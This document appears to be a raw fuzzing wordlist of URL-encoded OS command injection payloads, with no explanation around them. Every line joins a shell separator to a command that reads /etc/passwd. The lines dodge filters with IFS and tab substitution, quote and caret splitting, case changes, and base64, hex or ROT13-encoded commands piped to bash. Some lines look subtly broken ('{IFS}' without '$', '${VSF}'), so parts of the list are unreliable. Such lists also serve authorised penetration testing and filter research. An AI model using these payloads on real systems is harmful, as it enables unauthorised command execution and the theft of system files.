%3bcat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bcat%09${PATH:0:1}etc${PATH:0:1}passwd
%0acat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0acat%09${PATH:0:1}etc${PATH:0:1}passwd
%26cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26cat%09${PATH:0:1}etc${PATH:0:1}passwd
%7ccat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7ccat%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26cat%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7ccat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7ccat%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60cat%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29cat%09${PATH:0:1}etc${PATH:0:1}passwd
%3bc"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bc"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%0ac"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0ac"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%26c"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26c"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%7cc"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cc"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26c"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26c"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60c"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60c"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c"a"t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c"a"t%09${PATH:0:1}etc${PATH:0:1}passwd
%3bc'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bc'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%0ac'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0ac'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%26c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26c'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%7cc'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cc'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26c'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60c'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c'a't%09${PATH:0:1}etc${PATH:0:1}passwd
%3bc\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bc\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%0ac\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0ac\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%26c\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26c\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%7cc\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cc\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26c\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26c\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60c\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60c\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c\a\t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c\a\t%09${PATH:0:1}etc${PATH:0:1}passwd
%3bc$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bc$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%0ac$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0ac$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%26c$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26c$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%7cc$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cc$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26c$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26c$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60c$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60c$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c$@a$@t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c$@a$@t%09${PATH:0:1}etc${PATH:0:1}passwd
%3bc^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bc^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%0ac^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0ac^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%26c^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26c^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%7cc^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cc^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26c^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26c^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cc^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60c^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60c^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c^a^t${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29c^a^t%09${PATH:0:1}etc${PATH:0:1}passwd
%3bCaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%3bCaT%09${PATH:0:1}etc${PATH:0:1}passwd
%0aCaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%0aCaT%09${PATH:0:1}etc${PATH:0:1}passwd
%26CaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26CaT%09${PATH:0:1}etc${PATH:0:1}passwd
%7cCaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7cCaT%09${PATH:0:1}etc${PATH:0:1}passwd
%26%26CaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%26%26CaT%09${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cCaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%7c%7cCaT%09${PATH:0:1}etc${PATH:0:1}passwd
%60%60CaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%60%60CaT%09${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29CaT${IFS}${PATH:0:1}etc${PATH:0:1}passwd
%24%28%29CaT%09${PATH:0:1}etc${PATH:0:1}passwd
%3bb"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%0ab"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26b"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7cb"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26%26b"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7c%7cb"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%60%60b"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%24%28%29b"as"h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%3bb'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%0ab'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26b'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7cb'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26%26b'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7c%7cb'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%60%60b'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%24%28%29b'as'h<<<$(base64${IFS}-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%3bb"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%0ab"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26b"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7cb"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26%26b"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7c%7cb"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%60%60b"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%24%28%29b"as"h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%3bb'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%0ab'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26b'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7cb'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%26%26b'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%7c%7cb'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%60%60b'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%24%28%29b'as'h<<<$(base64%09-d<<<YydhJ3QgL2V0Yy9wYXNzd2Q=)
%3bb"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%0ab"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%26b"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%7cb"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%26%26b"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%7c%7cb"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%60%60b"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%24%28%29b"as"h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%3bb'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%0ab'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%26b'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%7cb'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%26%26b'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%7c%7cb'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%60%60b'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%24%28%29b'as'h<<<$(xxd{IFS}-p<<<6327612774202f6574632f706173737764)
%3bb"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%0ab"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%26b"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%7cb"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%26%26b"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%7c%7cb"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%60%60b"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%24%28%29b"as"h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%3bb'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%0ab'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%26b'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%7cb'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%26%26b'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%7c%7cb'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%60%60b'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%24%28%29b'as'h<<<$(xxd%09-p<<<6327612774202f6574632f706173737764)
%3bb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%0ab"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7cb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26%26b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7c%7cb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%60%60b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%24%28%29b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%3bb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%0ab'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7cb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26%26b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7c%7cb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%60%60b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%24%28%29b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%3bb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%0ab"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7cb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26%26b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7c%7cb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%60%60b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%24%28%29b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%3bb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%0ab'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7cb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%26%26b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%7c%7cb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%60%60b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%24%28%29b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g%09/rgp/cnffjq)
%3bb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%0ab"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7cb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26%26b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7c%7cb"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%60%60b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%24%28%29b"as"h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%3bb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%0ab'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7cb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26%26b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7c%7cb'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%60%60b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%24%28%29b'as'h<<<$(tr${IFS}'[A-Za-z]'${IFS}'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%3bb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%0ab"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7cb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26%26b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7c%7cb"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%60%60b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%24%28%29b"as"h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%3bb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%0ab'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7cb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%26%26b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%7c%7cb'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%60%60b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
%24%28%29b'as'h<<<$(tr%09'[A-Za-z]'%09'[N-ZA-Mn-za-m]'<<<p'n'g${VSF}/rgp/cnffjq)
